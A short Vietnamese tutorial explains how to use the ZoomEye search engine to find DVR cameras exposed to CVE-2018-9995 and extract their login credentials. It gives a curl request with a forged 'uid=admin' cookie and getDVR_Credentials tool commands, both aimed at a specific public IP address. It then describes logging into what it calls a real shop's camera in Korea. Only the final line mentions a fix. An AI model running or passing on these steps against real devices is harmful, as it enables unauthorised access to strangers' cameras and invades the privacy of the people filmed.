Tìm Camera bị lỗ hổng CVE-2018-9995 bằng ZoomEye
Bây giơ chúng ta sẽ thực hành với công cụ tìm kiếm ZoomEye để tìm camera có lỗ hổng CVE-2018-9995.
Mở trang ZoomEye và gõ cụm từ login.rsp để tìm các IP liên quan đến từ khóa này.
Kết quả sẽ ra một loạt danh sách các địa chỉ IP, bạn click vào dấu mũi tên màu đen để truy cập vào các địa chỉ đó.
Ví dụ chúng ta tìm được IP: http://59.18.152.180:9000. Bây giờ mình sẽ khai thác lỗ hổng tìm để user/password đăng nhập vào Camera này.
Dùng lệnh Curl
Sử dụng cú pháp:
curl "http://IP:Port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Mở CMD lên và dùng lệnh sau:
curl "http://59.18.152.180:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Có kết quả rồi: uid: là username, còn pwd: là mật khẩu.
Bạn mở trình duyệt Internet Explorer lên, truy cập vào IP camera bị Hack để đăng nhập vào trình điều khiển camera. Nhớ Enable ActiveX trình duyệt lên để xem được hình ảnh nhé.
Và đây là Camera của một cửa hàng nào đó, ở Hàn Quốc.
Dùng Tool getDVR_Credentials
Đây là công cụ bằng python dùng để tìm username/password của các Camera bị lỗ hổng CVE-2018-9995. Do đó yêu cầu bạn đã cài Python trên máy tính. Tool này có thể hoạt động trên Windows.
Trước tiên bạn tải Tool getDVR_Credentials. Giải nén vào ổ C:, mở CMD lên truy cập đến đường dẫn giải nén:
cd C:\CVE-2018-9995_dvr_credentials-dev_tool
pip install -r requirements
python getDVR_Credentials.py --host IP --port Port //IP và Port của Camera.
Ví dụ trường hợp trên ta sẽ gõ lệnh
python getDVR_Credentials.py --host 59.18.152.180 --port 9000
Và đây là kết quả:
Cách khắc phục lỗ hổng CVE-2018-9995: Đổi tài khoản đăng nhập và cập nhật Camera lên Firmware mới nhất.